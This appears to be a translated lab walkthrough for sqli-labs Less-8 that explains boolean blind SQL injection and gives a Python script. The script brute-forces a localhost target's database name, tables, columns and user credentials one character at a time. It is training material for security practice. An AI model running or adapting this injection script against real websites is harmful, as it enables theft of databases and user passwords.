sqlilabs less-8

First judge whether it is a number or a character


It's still OK to add characters to numbers , It's character type . Try again to construct . Because this time, it will only return whether it is correct or not , So consider blind injection .

First judge the length of the database
Then judge the database name

It used to

substr( Content ,n,m) From the content of the first n Bit interception m individual length() There is another key sql sentence
?id=1’ and
substr((select group_concat(table_name) from information_schema.tables
where table_schema =database() ),1,1)=‘u’–+

The workload is a little heavy , You can consider burp suite Or use a script

import requests
url = 'http://localhost/sqlilabs/Less-8/?id=1\''
datalens = 0 
datanamee = ''
sign = "You are in..........."
tablename = ''
columnlist = ''
list1= ['id','username','password','user','currentconnections','totalconnections']
valuelist = ''

# Database length 
for i in range(10):
    rl = str(i)
    lenurl = url + "and length(database())=" + rl + "--+"
    r = requests.get(lenurl)
    if sign in r.text:
        print("database len " + str(i))
        datalens = i + 1
# Database name 
wordlist = "abcdefghijklmnopqrstuvwxyz"
for i in range(1,datalens):
    dataname = url + "and substr(database()," + str(i) + "," +"1)"
    for w in wordlist:
        datanames = dataname + "=" + "'" + w + "'" + "--+"
        r = requests.get(datanames)
        if sign in r.text:
            datanamee += w
print("database name " + datanamee)

# Database table name 
wordlist2 = "abcdefghijklmnopqrstuvwxyz,"
for i in range(1,100):
    tableurl1 = url + " and substr((select group_concat(table_name) from information_schema.tables where table_schema = database())," + str(i) + ",1)="
    for v in wordlist2:
        tableurl = tableurl1 + "\'" + v + "\'" + "--+"
        r = requests.get(tableurl)
        if sign in r.text:
            tablename += v
print("database table " + tablename)

# Database field name 
for i in range(1,100):
    columnurl1 = url + " and substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\' )," + str(i) + ",1)="
    for v in wordlist2:
        columnurl = columnurl1 + "\'" + v + "\'" + "--+"
        r = requests.get(columnurl)
        if sign in r.text:
            columnlist += v
print("database colum " + columnlist)
print(list1)

# Database tuple 
wordlist2 = "0123456789abcdefghijklmnopqrstuvwxyz,=-_/\\."

for n in range(6):
    for i in range(1,200):
        valueurl1 = url + " and substr((select group_concat(" + list1[n] + ") from users )," + str(i) + ",1)="
        for v in wordlist2:
            valueurl = valueurl1 + "\'" + v + "\'" + "--+"
            r = requests.get(valueurl)
            if sign in r.text:
                valuelist += v
    print("database " + list1[n] + ' ' + valuelist)
    valuelist = ''

There for all to see , Bloggers are too weak to program , To be improved .